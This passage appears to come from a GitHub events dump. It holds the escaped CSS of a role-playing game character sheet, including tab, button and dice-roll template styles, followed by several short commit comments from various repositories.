margin-bottom:0px;\r\n    font-size:0.9em;\r\n    height:2.2em;\r\n    font-family: Copperplate, 'Copperplate Gothic Light', fantasy;\r\n}\r\n.charsheet .repcontrol_edit\r\n{\r\n    display: inline-block;\r\n    background:#7F2108;\r\n    color:white;\r\n    text-shadow:0px 0px 2px #000,0px 0px 2px #000,0px 0px 2px #000;\r\n    box-shadow:none;\r\n    float:none!important;\r\n    margin-bottom:5px;\r\n    font-size:0.9em;\r\n    height:2.2em;\r\n    font-family: Copperplate, 'Copperplate Gothic Light', fantasy;\r\n}\r\n.charsheet .repcontrol_del {\r\n    background:red;\r\n    color:white;\r\n    text-shadow:0px 0px 2px #000,0px 0px 2px #000,0px 0px 2px #000;\r\n    box-shadow:none;\r\n    float:none!important;\r\n    margin-bottom:5px;\r\n    font-size:0.9em;\r\n    height:2.2em;\r\n}\r\n\r\n/*---------------------------Top Half (Background Images)---------------------*/\r\n\r\nRemoved1\r\n\r\n/*---------------------------Tabs Setup---------------------------------------*/\r\n.charsheet {\r\n    width:840px;\r\n}\r\n\r\ndiv.sheet-core-content { \r\n    display: none; \r\n    width:840px;\r\n}\r\n.charsheet div[class^=\"sheet-section\"] {\r\n    display: none;\r\n    background-size:840px;\r\n}\r\n\r\n.charsheet input.sheet-tab1:checked ~ div.sheet-section-1,\r\n.charsheet input.sheet-tab2:checked ~ div.sheet-section-2,\r\n.charsheet input.sheet-tab3:checked ~ div.sheet-section-3,\r\n.charsheet input.sheet-tab4:checked ~ div.sheet-section-4,\r\n.charsheet input.sheet-tab5:checked ~ div.sheet-section-5,\r\n.charsheet input.sheet-tab6:checked ~ div.sheet-section-6 {\r\n    display: block;\r\n}\r\n\r\n.charsheet input.sheet-tab99:checked ~ div[class^=\"sheet-section\"] {\r\n    display: block;\r\n}\r\n\r\n.charsheet input.sheet-tab {\r\n    width: 100px;\r\n    height: 20px;\r\n    cursor: pointer;    \r\n    position: relative;\r\n    opacity: 0;\r\n    z-index: 998;\r\n    box-shadow: 0px 0px 5px blue;\r\n}\r\n\r\n.charsheet span.sheet-tab {\r\n    text-align: center;\r\n    display: inline-block; \r\n    font-size: 13px;    \r\n    background-repeat: no-repeat;\r\n    color: #7F2108; \r\n\tfont-weight: bold;\r\n    font-family: Copperplate, 'Copperplate Gothic Light', fantasy;\r\n\tborder-radius: 4px;\r\n    border: 2px solid #7F2108;\r\n\t\r\n\twidth: 100px; \r\n    height: 20px; \r\n    cursor: pointer;\t\r\n\tposition: relative;\r\n\tvertical-align: middle;\r\n\tmargin-left: -105px;\r\n}\r\n\r\n.charsheet input.sheet-tab1:checked + span.sheet-tab1,\r\n.charsheet input.sheet-tab2:checked + span.sheet-tab2,\r\n.charsheet input.sheet-tab3:checked + span.sheet-tab3,\r\n.charsheet input.sheet-tab4:checked + span.sheet-tab4,\r\n.charsheet input.sheet-tab5:checked + span.sheet-tab5,\r\n.charsheet input.sheet-tab6:checked + span.sheet-tab6,\r\n.charsheet input.sheet-tab99:checked + span.sheet-tab99 {\r\n    \r\n    background: #7F2108;  /*originally ab8b57*/  \r\n    color: white; /*originally white*/\r\n\tborder-radius: 4px;\r\n    border: 2px solid #7F2108;\r\n}\r\n/*----------- End Tab Setup -----------*/\r\n\r\n/*---------------------------Font---------------------------------------------*/\r\n.sheet-tableI {\r\n    margin-left:auto;\r\n    margin-right:auto;\r\n    font-family: Copperplate, 'Copperplate Gothic Light', fantasy;\r\n}\r\n.sheet-tableI th {\r\n    font-size:8px;\r\n    vertical-align:super;\r\n}\r\n.sheet-font {\r\n    font-family: Copperplate, 'Copperplate Gothic Light', fantasy;\r\n    font-weight:normal;\r\n    }\r\n.sheet-tableII th {\r\n    background:#000;\r\n    color:white;\r\n}\r\n.sheet-tableII {\r\n    margin-left:auto;\r\n    margin-right:auto;\r\n}\r\n.sheet-tableII th.sheet-heading {\r\n    background:#000;\r\n    color:white;\r\n    font-size:9px;\r\n}\r\n\r\n.sheet-text {\r\n    border-top:none;\r\n    border-left:none;\r\n    border-right:none;\r\n    border-radius:0px;\r\n    box-shadow:none;\r\n    font-size:12px;\r\n    background: transparent;\r\n}\r\ninput.sheet-text[type=\"text\"]:focus {\r\n    border-bottom:1px solid #000;\r\n    border-radius:0px;\r\n    box-shadow:none;\r\n    background: white;\r\n}\r\n.sheet-title {\r\n    border-top:none;\r\n    border-left:none;\r\n    border-right:none;\r\n    border-radius:0px;\r\n    box-shadow:none;\r\n    font-size:1.8em;\r\n    font-family: Copperplate, 'Copperplate Gothic Light', fantasy;\r\n    text-align:center;\r\n    background: transparent;\r\n}\r\n.sheet-number[type=\"text\"]:focus,\r\n.sheet-number[type=\"number\"]:focus,\r\ninput.sheet-title[type=\"text\"]:focus {\r\n    border-radius:0px;\r\n    box-shadow:none;\r\n    background: white;\r\n}\r\n.sheet-number[type=\"number\"] {\r\n    background: transparent;\r\n    border:none;\r\n    border-radius:0px;\r\n    box-shadow:none;\r\n    text-align:center;\r\n    border-bottom:1px solid #000;\r\n}\r\n.sheet-number[type=\"number\"]::-webkit-inner-spin-button, \r\n.sheet-number[type=\"number\"]::-webkit-outer-spin-button { \r\n  -webkit-appearance: none; \r\n  margin: 0; \r\n}\r\n.sheet-number[type=\"text\"] {\r\n    background: transparent;\r\n    border:none;\r\n    border-radius:0px;\r\n    box-shadow:none;\r\n    text-align:center;\r\n    border-bottom:1px solid #000;\r\n    width:100px;\r\n}\r\ninput[type=number] {\r\n    -moz-appearance:textfield;\r\n}\r\ninput[type=number]:hover {\r\n    -moz-appearance:none;\r\n}\r\n.sheet-ability {\r\n    background: white;\r\n    border:none;\r\n    border-radius:5px;\r\n    box-shadow:none;\r\n    text-align:center;\r\n    color:black:\r\n    font-size:1.2em;\r\n    margin:2px;\r\n}\r\n.sheet-ability[type=\"text\"] {\r\n    background: white;\r\n    border:none;\r\n    border-radius:5px;\r\n    box-shadow:none;\r\n    text-align:center;\r\n    color:black:\r\n    font-size:1.2em;\r\n    margin:2px;\r\n    width:100px;\r\n    }\r\nselect.sheet-number { \r\n    background: transparent;\r\n    width:80px;\r\n    border:none;\r\n    border-radius:0px;\r\n    margin-bottom: 0;\r\n    -webkit-appearance: none;\r\n    -moz-appearance: none;\r\n    text-indent: 1px;\r\n    text-overflow: ''; \r\n    padding-top:0;\r\n    font-size:0.9em;\r\n}\r\n.sheet-type {\r\n    border:none;\r\n    border-radius:0px;\r\n    box-shadow:none;\r\n    text-align:center;\r\n    background: transparent;\r\n    width:130px;\r\n}\r\n.sheet-Rating[type=\"number\"]:-ms-input-placeholder,\r\n.sheet-Specialty[type=\"number\"]:-ms-input-placeholder{\r\n    font-size:0.5em;\r\n} \r\n.sheet-Rating[type=\"number\"]:placeholder,\r\n.sheet-Specialty[type=\"number\"]:placeholder{\r\n    font-size:0.5em;\r\n} \r\n.sheet-Rating[type=\"number\"]::-webkit-input-placeholder,\r\n.sheet-Specialty[type=\"number\"]::-webkit-input-placeholder{\r\n    font-size:0.5em;\r\n    }\r\n.sheet-Rating[type=\"number\"]:-moz-placeholder,\r\n.sheet-Specialty[type=\"number\"]:-moz-placeholder{\r\n    font-size:0.5em;\r\n} \r\n.sheet-Rating[type=\"number\"]::-moz-placeholder,\r\n.sheet-Specialty[type=\"number\"]::-moz-placeholder {\r\n    font-size:0.5em;\r\n} \r\nselect.sheet-Specialty { \r\n    width:90px;\r\n    margin-bottom: 0;\r\n    -webkit-appearance: none;\r\n    -moz-appearance: none;\r\n    text-indent: 1px;\r\n    text-overflow: ''; \r\n    padding-top:0;\r\n    font-size:0.7em;\r\n}\r\n\r\n.sheet-smaller {\r\n    font-size:0.8em\r\n}\r\n.sheet-smallest {\r\n    font-size:0.7em\r\n}\r\n\r\nh3 {\r\n    font-family: Copperplate, 'Copperplate Gothic Light', fantasy;\r\n    text-align:center;\r\n}\r\nh4 {\r\n    font-family: Copperplate, 'Copperplate Gothic Light', fantasy;\r\n    color: #000;\r\n    font-weight:bold;\r\n    text-align:center;\r\n}\r\nh5 {\r\n    font-family: Copperplate, 'Copperplate Gothic Light', fantasy;\r\n    color: #000;\r\n    font-weight:bold;\r\n}\r\ntextarea.sheet-notes {\r\n    border-radius:15px;\r\n    border: 2px solid #7F2108;\r\n    height:35px;\r\n    resize:vertical;\r\n    font-family: Copperplate, 'Copperplate Gothic Light', fantasy;\r\n}\r\n\r\ntextarea.sheet-longnotes {\r\n    border-radius:15px;\r\n    border: 2px solid #7F2108;\r\n    height:105px;\r\n    resize:vertical;\r\n    font-family: Copperplate, 'Copperplate Gothic Light', fantasy;\r\n}\r\n/*---------------------------\"Tootl Tips\"-------------------------------------*/\r\ndiv.sheet-tooltips {\r\n  position: relative;\r\n  display: inline;\r\n}\r\ndiv.sheet-tooltips span {\r\n  position: absolute;\r\n  width:140px;\r\n  color: #000000;\r\n  background: #FFFFFF;\r\n  border: 2px solid #6D6D6D;\r\n  height: 30px;\r\n  line-height: 30px;\r\n  text-align: center;\r\n  visibility: hidden;\r\n  border-radius: 6px;\r\n}\r\ndiv.sheet-tooltips span:before {\r\n  content: '';\r\n  position: absolute;\r\n  top: 50%;\r\n  right: 100%;\r\n  margin-top: -12px;\r\n  width: 0; height: 0;\r\n  border-right: 12px solid #6D6D6D;\r\n  border-top: 12px solid transparent;\r\n  border-bottom: 12px solid transparent;\r\n}\r\ndiv.sheet-tooltips span:after {\r\n  content: '';\r\n  position: absolute;\r\n  top: 50%;\r\n  right: 100%;\r\n  margin-top: -8px;\r\n  width: 0; height: 0;\r\n  border-right: 8px solid #FFFFFF;\r\n  border-top: 8px solid transparent;\r\n  border-bottom: 8px solid transparent;\r\n}\r\ndiv.sheet-tooltips:hover span {\r\n  visibility: visible;\r\n  opacity: 1;\r\n  left: 100%;\r\n  top: 50%;\r\n  margin-top: -15px;\r\n  margin-left: -15px;\r\n  z-index: 999;\r\n}\r\n.sheet-skill_name {   \r\n    -moz-border-radius: 5px; \r\n    -webkit-border-radius: 5px; \r\n    border-radius: 5px; \r\n    border: none; \r\n    box-shadow: none;\r\n    outline:0; \r\n    padding:0;\r\n    margin:0;\r\n    \r\n    background: transparent;\r\n    font-weight:bold;\r\n    font-variant:small-caps;\r\n    width: 90px; \r\n    color: black;\r\n    text-align:center;\r\n\r\n}\r\n/*---------------------------Radio Boxes/Tootl Tips---------------------------*/\r\ndiv.sheet-tooltipsdown {\r\n  position: relative;\r\n  display: inline;\r\n}\r\ndiv.sheet-tooltipsdown span {\r\n  position: absolute;\r\n  width:500px;\r\n  color: #000;\r\n  background: #fff;\r\n  height: 225px;\r\n  line-height: 30px;\r\n  text-align: center;\r\n  visibility: hidden;\r\n  border-radius: 6px;\r\n  border:3px solid black;\r\n}\r\ndiv.sheet-tooltipsdown span:after {\r\n  content: '';\r\n  position: absolute;\r\n  top: 50%;\r\n  right: 100%;\r\n  margin-top: -8px;\r\n  width: 0; height: 0;\r\n  border-right: 8px solid #000000;\r\n  border-top: 8px solid transparent;\r\n  border-bottom: 8px solid transparent;\r\n}\r\ndiv:hover.sheet-tooltipsdown span {\r\n  visibility: visible;\r\n  opacity: 1;\r\n  left: 100%;\r\n  top: 50%;\r\n  margin-top: -15px;\r\n  margin-left: 15px;\r\n  z-index: 999;\r\n}\r\n/*---------------------------Radio Boxes--------------------------------------*/\r\ninput.sheet-hider:not(:checked) ~ div.sheet-hold {\r\n    display: none;\r\n}\r\ninput.sheet-hider:checked ~ div.sheet-hold {\r\n    display: inline;\r\n}\r\n\r\n.sheet-hidden {\r\n    display:none;\r\n}\r\n/*---------------------------Hide Actual Radio--------------------------------*/\r\ninput.sheet-normal[type=\"radio\"]\r\n{\r\n    opacity: 0;\r\n    width: 16px;\r\n    height: 16px;\r\n    position: relative;\r\n    top: 5px;\r\n    left: 6px;\r\n    margin: -10px;\r\n    cursor: pointer;\r\n    z-index: 1;\r\n}\r\n/*---------------------------Fake Radio---------------------------------------*/\r\ninput.sheet-normal[type=\"radio\"] + span::before\r\n{\r\n    margin-right: 2px;\r\n    border: solid 1px #a8a8a8;\r\n    line-height: 14px;\r\n    text-align: center;\r\n    display: inline-block;\r\n    vertical-align: middle;\r\n\r\n    -moz-box-shadow: 0 0 10px  rgba(216,218,300, 1.8);\r\n    -webkit-box-shadow: 0 0 10px  rgba(216,218,300, 1.8);\r\n    box-shadow: 0 0 10px  rgba(216,218,300, 1.8);\r\n    \r\n    background: black;\r\n    \r\n    color:black;\r\n    content: \"\";\r\n    width: 12px;\r\n    height: 12px;\r\n    \r\n    -moz-border-radius: 50%;\r\n    -webkit-border-radius: 50%;\r\n    border-radius: 50%;\r\n}\r\n/*---------------------------Remove Dot From All Radios After Selecting One---*/\r\ninput.sheet-normal[type=\"radio\"]:checked ~ input.sheet-normal[type=\"radio\"] + span::before\r\n{    \r\n    content: \"\";    \r\n    background: #fff;\r\n}\r\n/*---------------------------Empty Traits-------------------------------------*/\r\ninput.sheet-zero[type=\"radio\"]:checked + span::before {\r\n    opacity: 0;\r\n}\r\n\r\ninput.sheet-zero[type=\"radio\"]:hover + span::before {\r\n    opacity: 1;\r\n}\r\n\r\ninput.sheet-zero[type=\"radio\"] + span::before {\r\n    font-size: 12px;\r\n    content: \"✖\";\r\n    opacity: 0.25;\r\n    background: none;\r\n}\r\n/*---------------------------Hide Actual Big Radio----------------------------*/\r\ninput.sheet-bigcheck[type=\"radio\"]\r\n{\r\n    width: 14px;\r\n    height: 14px;\r\n    position: relative;\r\n    top: -2px;\r\n    left: 5px;\r\n    margin-left: 0px;\r\n    margin-top: -10px;\r\n    margin-bottom: -10px;\r\n    margin-right: -10px;\r\n    cursor: pointer;\r\n    z-index: 1;\r\n    opacity: 0;\r\n}\r\n/*------------------------------Fake Big Radio--------------------------------*/\r\ninput.sheet-bigcheck[type=\"radio\"] + span::before {\r\n    margin-right: 4px;\r\n    line-height: 14px;\r\n    text-align: center;\r\n    display: inline-block;\r\n    vertical-align: middle;\r\n    position: relative;\r\n    top: -2px;\r\n    left: 0px;\r\n\r\n    -moz-box-shadow: 0 0 2px #000;\r\n    -webkit-box-shadow: 0 0 2px #000;\r\n    box-shadow: inset 0 0 2px #000, inset 0 0 4px #000;\r\n    background:#F3F8F6;\r\n}\r\n\r\ninput.sheet-bigcheck[type=\"radio\"] + span::before {\r\n    content: \"\";\r\n    width: 14px;\r\n    height: 14px;\r\n    font-size: 12px;\r\n    \r\n    -moz-border-radius: 3px;\r\n    -webkit-border-radius: 3px;\r\n    border-radius: 3px;\r\n}\r\ninput.sheet-bigcheck[type=\"radio\"]:checked + span::before {\r\n    color: red;\r\n    content: \"✓\";\r\n    text-shadow:none;\r\n    font-weight:bold;\r\n}\r\n/*---------------------------Hide Actual Big Checkbox-------------------------*/\r\ninput.sheet-bigcheck[type=\"Checkbox\"] {\r\n    width: 14px;\r\n    height: 14px;\r\n    position: relative;\r\n    top: -2px;\r\n    left: 5px;\r\n    margin-left: 0px;\r\n    margin-top: -10px;\r\n    margin-bottom: -10px;\r\n    margin-right: -10px;\r\n    cursor: pointer;\r\n    z-index: 1;\r\n    opacity: 0;\r\n}\r\n/*---------------------------Fake Big Checkbox--------------------------------*/\r\ninput.sheet-bigcheck[type=\"Checkbox\"] + span::before {\r\n    margin-right: 4px;\r\n    line-height: 14px;\r\n    text-align: center;\r\n    display: inline-block;\r\n    vertical-align: middle;\r\n    position: relative;\r\n    top: -2px;\r\n    left: 0px;\r\n\r\n    -moz-box-shadow: 0 0 2px #000;\r\n    -webkit-box-shadow: 0 0 2px #000;\r\n    box-shadow: inset 0 0 2px #000, inset 0 0 4px #000;\r\n}\r\n\r\ninput.sheet-bigcheck[type=\"Checkbox\"] + span::before\r\n{\r\n    content: \"\";\r\n    width: 14px;\r\n    height: 14px;\r\n    font-size: 12px;\r\n    \r\n    -moz-border-radius: 3px;\r\n    -webkit-border-radius: 3px;\r\n    border-radius: 3px;\r\n}\r\ninput.sheet-bigcheck[type=\"Checkbox\"]:checked + span::before\r\n{\r\n    color: red;\r\n    content: \"✓\";\r\n    text-shadow:none;\r\n    font-weight:bold;\r\n}\r\n/*---------------------------Skill Button-------------------------------------*/\r\n.sheet-skillbtn button[type=\"roll\"]:before,\r\n.sheet-skillbtn:before  {\r\n    content: \"\"!important;\r\n    display: none;\r\n    border:none;\r\n}\r\n.sheet-skillbtn button[type=\"roll\"],\r\n.sheet-skillbtn {\r\n    display: block;\r\n    -moz-border-radius: 5px; \r\n    -webkit-border-radius: 5px; \r\n    border-radius: 5px; \r\n    border: 1px solid #000; \r\n    box-shadow: none;\r\n    outline:0; \r\n    \r\n    margin: 0;\r\n    background: black;\r\n    font-size:1em !important;  \r\n    font-weight:bold;\r\n    font-variant:small-caps;\r\n    height:50px; \r\n    width: 90px; \r\n    padding-left:20px;\r\n    color: white;\r\n}\r\n.sheet-skillbtn button[type=\"roll\"]:hover,\r\n.sheet-skillbtn:hover  {\r\n  background: black; /* For browsers that do not support gradients */\r\n  background: -webkit-linear-gradient(left, black , white); /* For Safari 5.1 to 6.0 */\r\n  background: -o-linear-gradient(right, black, white); /* For Opera 11.1 to 12.0 */\r\n  background: -moz-linear-gradient(right, black, white); /* For Firefox 3.6 to 15 */\r\n  background: linear-gradient(to right, black , white); /* Standard syntax */\r\n}\r\n\r\n.sheet-skillbtn button[type=\"roll\"]:active,\r\n.sheet-skillbtn:active  {\r\n  background: black; /* For browsers that do not support gradients */\r\n  background: -webkit-linear-gradient(left, white , black); /* For Safari 5.1 to 6.0 */\r\n  background: -o-linear-gradient(right, white, black); /* For Opera 11.1 to 12.0 */\r\n  background: -moz-linear-gradient(right, white, black); /* For Firefox 3.6 to 15 */\r\n  background: linear-gradient(to right, white , black); /* Standard syntax */\r\n}\r\n/*---------------------------Button-------------------------------------------*/\r\n.sheet-btn button[type=\"roll\"]:before,\r\n.sheet-btn:before  {\r\n    content: \"\"!important;\r\n    display: none;\r\n    border:none;\r\n}\r\n.sheet-btn button[type=\"roll\"],\r\n.sheet-btn {\r\n    display: block;\r\n    -moz-border-radius: 5px; \r\n    -webkit-border-radius: 5px; \r\n    border-radius: 5px; \r\n    border: none; \r\n    box-shadow: none;\r\n    outline:0; \r\n    \r\n    margin: 0;\r\n    background: transparent;\r\n    font-size:12px !important;  \r\n    font-weight:bold;\r\n    font-variant:small-caps;\r\n    height:20px; \r\n    width: 90px; \r\n    padding-left:20px;\r\n    color: black;\r\n}\r\n.sheet-btn button[type=\"roll\"]:hover,\r\n.sheet-btn:hover  {\r\n    background: black; /* For browsers that do not support gradients */\r\n    background: -webkit-linear-gradient(left, black , white); /* For Safari 5.1 to 6.0 */\r\n    background: -o-linear-gradient(right, black, white); /* For Opera 11.1 to 12.0 */\r\n    background: -moz-linear-gradient(right, black, white); /* For Firefox 3.6 to 15 */\r\n    background: linear-gradient(to right, black , white); /* Standard syntax */\r\n    color: white;\r\n}\r\n\r\n.sheet-btn button[type=\"roll\"]:active,\r\n.sheet-btn:active  {\r\n    background: black; /* For browsers that do not support gradients */\r\n    background: -webkit-linear-gradient(left, white , black); /* For Safari 5.1 to 6.0 */\r\n    background: -o-linear-gradient(right, white, black); /* For Opera 11.1 to 12.0 */\r\n    background: -moz-linear-gradient(right, white, black); /* For Firefox 3.6 to 15 */\r\n    background: linear-gradient(to right, white , black); /* Standard syntax */\r\n    color: white;\r\n}\r\n/*---------------------------Weapons------------------------------------------*/\r\n.sheet-weapon button[type=\"roll\"]:before,\r\n.sheet-weapon:before  {\r\n    content: \"\"!important;\r\n    display: none;\r\n    border:none;\r\n}\r\n.sheet-weapon button[type=\"roll\"],\r\n.sheet-weapon {\r\n    display: block;\r\n    -moz-border-radius: 5px; \r\n    -webkit-border-radius: 5px; \r\n    border-radius: 5px; \r\n    border: none; \r\n    box-shadow: none;\r\n    outline:0; \r\n    \r\n    margin: 0;\r\n    background: black; \r\n    font-size:1.2em !important;  \r\n    font-weight:bold;\r\n    height:50px; \r\n    width: 100px; \r\n    padding-left:20px;\r\n    color: white;\r\n    -ms-transform: rotate(90deg); /* IE 9 */\r\n    -webkit-transform: rotate(90deg); /* Safari */\r\n    transform: rotate(90deg);\r\n}\r\n.sheet-weapon button[type=\"roll\"]:hover,\r\n.sheet-weapon:hover  {\r\n    background: black; /* For browsers that do not support gradients */\r\n    background: -webkit-linear-gradient(white, black); /* For Safari 5.1 to 6.0 */\r\n    background: -o-linear-gradient(white, black); /* For Opera 11.1 to 12.0 */\r\n    background: -moz-linear-gradient(white, black); /* For Firefox 3.6 to 15 */\r\n    background: linear-gradient(white, black); /* Standard syntax */\r\n}\r\n\r\n.sheet-weapon button[type=\"roll\"]:active,\r\n.sheet-weapon:active  {\r\n    \r\n    background: white; /* For browsers that do not support gradients */\r\n    background: -webkit-linear-gradient(black, white); /* For Safari 5.1 to 6.0 */\r\n    background: -o-linear-gradient(black, white); /* For Opera 11.1 to 12.0 */\r\n    background: -moz-linear-gradient(black, white); /* For Firefox 3.6 to 15 */\r\n    background: linear-gradient(black, white); /* Standard syntax */\r\n}\r\n/*---------------------------FX Futton----------------------------------------*/\r\n.sheet-fxbtn button[type=\"roll\"]:before,\r\n.sheet-fxbtn:before  {\r\n    content: \"\"!important;\r\n    display: none;\r\n    border:none;\r\n}\r\n.sheet-fxbtn button[type=\"roll\"],\r\n.sheet-fxbtn {\r\n    display: block;\r\n    -moz-border-radius: 5px; \r\n    -webkit-border-radius: 5px; \r\n    border-radius: 5px; \r\n    border: 2px solid #7F2108; \r\n    box-shadow: none;\r\n    outline:0; \r\n    \r\n    margin: 0;\r\n    background: transparent;\r\n    font-size:12px !important;  \r\n    font-weight:bold;\r\n    font-variant:small-caps;\r\n    height:20px; \r\n    width: 90px; \r\n    padding-left:20px;\r\n    color: #fff;\r\n}\r\n.sheet-fxbtn button[type=\"roll\"]:hover,\r\n.sheet-fxbtn:hover  {\r\n    background: black; /* For browsers that do not support gradients */\r\n    background: -webkit-linear-gradient(left, black , #7F2108); /* For Safari 5.1 to 6.0 */\r\n    background: -o-linear-gradient(right, black, #7F2108); /* For Opera 11.1 to 12.0 */\r\n    background: -moz-linear-gradient(right, black, #7F2108); /* For Firefox 3.6 to 15 */\r\n    background: linear-gradient(to right, black , #7F2108); /* Standard syntax */\r\n    color: white;\r\n}\r\n\r\n.sheet-fxbtn button[type=\"roll\"]:active,\r\n.sheet-fxbtn:active  {\r\n    background: black; /* For browsers that do not support gradients */\r\n    background: -webkit-linear-gradient(left, #7F2108 , black); /* For Safari 5.1 to 6.0 */\r\n    background: -o-linear-gradient(right, #7F2108, black); /* For Opera 11.1 to 12.0 */\r\n    background: -moz-linear-gradient(right, #7F2108, black); /* For Firefox 3.6 to 15 */\r\n    background: linear-gradient(to right, #7F2108 , black); /* Standard syntax */\r\n    color: white;\r\n}\r\n/*---------------------------Roll Templates-----------------------------------*/\r\n    /*------------Show-----------*/\r\n.sheet-rolltemplate-show table {\r\n    width: 100%;\r\n    border-radius:15px 15px 15px 15px;\r\n    color: #7F2108;\r\n    font-size: 1em;\r\n    font-variant: small-caps;\r\n    box-shadow: none;\r\n    background: #F3F8F6;\r\n    box-shadow: 0px 0px 2px #7F2108, 0px 0px 2px #7F2108, 0px 0px 2px #7F2108;\r\n}\r\n\r\n.sheet-rolltemplate-show td {\r\n    padding: 5px;\r\n}\r\n\r\n    /*------------Attack-----------*/\r\n\r\n.sheet-rolltemplate-attack table {\r\n    width: 100%;\r\n    border-radius:15px 15px 15px 15px;\r\n    color: #7F2108;\r\n    font-size: 1em;\r\n    font-variant: small-caps;\r\n    box-shadow: none;\r\n    background: #F3F8F6;\r\n    box-shadow: 0px 0px 2px #7F2108, 0px 0px 2px #7F2108, 0px 0px 2px #7F2108;\r\n}\r\n\r\n.sheet-rolltemplate-attack td {\r\n    padding: 5px;\r\n}\r\n.sheet-rolltemplate-attack td.sheet-confirm {\r\n    font-style:italic;\r\n    color:black;\r\n}\r\n.sheet-rolltemplate-attack td.sheet-detail {\r\n    font-style:italic;\r\n    border-radius:15px 15px 0px 0px;\r\n}\r\n\r\n.sheet-rolltemplate-attack td.sheet-last_left {\r\n    border-radius:0px 0px 0px 15px;\r\n}\r\n.sheet-rolltemplate-attack td.sheet-last_right {\r\n    border-radius:0px 0px 15px 0px;\r\n}\r\n.sheet-rolltemplate-attack td.sheet-damage .inlinerollresult .fullcrit,\r\n.sheet-rolltemplate-attack td.sheet-damage .inlinerollresult .fullfail,\r\n.sheet-rolltemplate-attack td.sheet-damage .inlinerollresult .importantroll,\r\n.sheet-rolltemplate-attack td.sheet-damage .inlinerollresult,\r\n.sheet-rolltemplate-attack .inlinerollresult {\r\n    background:transparent;\r\n    border:none;\r\n    box-shadow:none;\r\n    color:black;\r\n}\r\n.sheet-rolltemplate-attack .inlinerollresult.fullcrit {\r\n    border: none;\r\n    background:black;\r\n    color:white;\r\n    border-radius:5px;\r\n    box-shadow:none;\r\n}\r\n\r\n.sheet-rolltemplate-attack .inlinerollresult.fullfail {\r\n    border: none;\r\n    background:red;\r\n    color:white;\r\n    border-radius:5px;\r\n    box-shadow:none;\r\n}\r\n\r\n.sheet-rolltemplate-attack .inlinerollresult.importantroll {\r\n    border: none;\r\n}\r\n    /*------------Show-----------*/\r\n.sheet-rolltemplate-fx table {\r\n    width: 100%;\r\n    border-radius:15px 15px 15px 15px;\r\n    color: #7F2108;\r\n    font-size: 1em;\r\n    font-variant: small-caps;\r\n    box-shadow: none;\r\n    background: #F3F8F6;\r\n    box-shadow: 0px 0px 2px #7F2108, 0px 0px 2px #7F2108, 0px 0px 2px #7F2108;\r\n}\r\n\r\n.sheet-rolltemplate-fx td {\r\n    padding: 5px;\r\n}"}},"created_at":"2016-09-27T04:27:05Z"}
{"id":"4621910193","type":"CommitCommentEvent","actor":{"login":"WerterHong"},"repo":{"name":"WerterHong/myPros"},"payload":{"comment":{"id":19184714,"position":null,"line":null,"path":null,"commit_id":"93f3f8180ae08d91173d348b19119fde72b4d4ee","created_at":"2016-09-27T04:27:50Z","updated_at":"2016-09-27T04:27:50Z","body":"Commit Bing Search Engine"}},"created_at":"2016-09-27T04:27:50Z"}
{"id":"4621910735","type":"CommitCommentEvent","actor":{"login":"Dabug123"},"repo":{"name":"CypherOS/system_core"},"payload":{"comment":{"id":19184715,"position":null,"line":null,"path":null,"commit_id":"82732f395f367a1969ae7b3fe1b3319578d58954","created_at":"2016-09-27T04:28:05Z","updated_at":"2016-09-27T04:28:05Z","body":"Lol u still don't get it what did u take your commit lessons from benzo"}},"created_at":"2016-09-27T04:28:05Z"}
{"id":"4621911064","type":"CommitCommentEvent","actor":{"login":"fragglet"},"repo":{"name":"freedoom/freedoom"},"payload":{"comment":{"id":19184719,"position":null,"line":null,"path":null,"commit_id":"13bcf645e076cebbd937a1aa7317608ffa8b6bb7","created_at":"2016-09-27T04:28:13Z","updated_at":"2016-09-27T04:28:13Z","body":"No problem - thanks!"}},"created_at":"2016-09-27T04:28:13Z"}
{"id":"4621911860","type":"CommitCommentEvent","actor":{"login":"rahelh"},"repo":{"name":"rahelh/Group_4"},"payload":{"comment":{"id":19184726,"position":null,"line":null,"path":null,"commit_id":"498e523c668b6217dba03f26f72056e3d7786f40","created_at":"2016-09-27T04:28:34Z","updated_at":"2016-09-27T04:28:34Z","body":"If we deliver the product according to the business requirement, they will satisfy."}},"created_at":"2016-09-27T04:28:34Z"}
{"id":"4621919848","type":"CommitCommentEvent","actor":{"login":"jadrake75"},"repo":{"name":"jadrake75/cli"},"payload":{"comment":{"id":19184744,"position":null,"line":null,"path":null,"commit_id":"78631bccad63f0f687bf8ed831656d9bba4eefb5","created_at":"2016-09-27T04:32:09Z","updated_at":"2016-09-27T04:32:09Z","body":"Note - this was integrated back to aurelia-CLI in 0.16.2\r\nhttps://github.com/aurelia/cli/commit/24eb22a5621ba6f942adb143ab5112bd65f17499\r\n"}},"created_at":"2016-09-27T04:32:09Z"}
{"id":"4621925367","type":"CommitCommentEvent","actor":{"login":"lowe"},"repo":{"name":"dropbox/zxcvbn"},"payload":{"comment":{"id":19184755,"position":null,"line":null,"path":null,"commit_id":"6350ec95736472dff538122f1e757618bb9c0e7f","created_at":"2016-09-27T04:34:39Z","updated_at":"2016-09-27T04:34:39Z","body":"Agh, I forgot `--tags`!\r\nThank you for catching, it is now fixed. "}},"created_at":"2016-09-27T04:34:39Z"}
{"id":"4621926450","type":"CommitCommentEvent","actor":{"login":"loooody"},"repo":{"name":"loooody/loooody.github.io"},"payload":{"comment":{"id":19184759,"position":null,"line":null,"path":null,"commit_id":"3b6e097502f022d2839a2f66b68231c18b1f888c","created_at":"2016-09-27T04:35:08Z","updated_at":"2016-09-27T04:35:08Z","body":"hello world"}},"created_at":"2016-09-27T04:35:08Z"}
{"id":"4621932787","type":"CommitCommentEvent","actor":{"login":"lencioni"},"repo":{"name":"Galooshi/happo"},"payload":{"comment":{"id":19184784,"position":13,"line":13,"path":"js/src/alignArrays.js","commit_id":"35b44f1941fdfb63681a1088982a4cac4b571215","created_at":"2016-09-27T04:37:51Z","updated_at":"2016-09-27T04:37:51Z","body":"FYI: I did a small benchmark, and in Chrome, using the array fill method is about 20x faster than what we have here!\r\n\r\nindex.js:24 original 350.28999999999996\r\nindex.js:33 fill 17.975000000000023\r\nindex.js:42 original 375.38499999999993\r\nindex.js:51 fill 17.470000000000027"}},"created_at":"2016-09-27T04:37:51Z"}
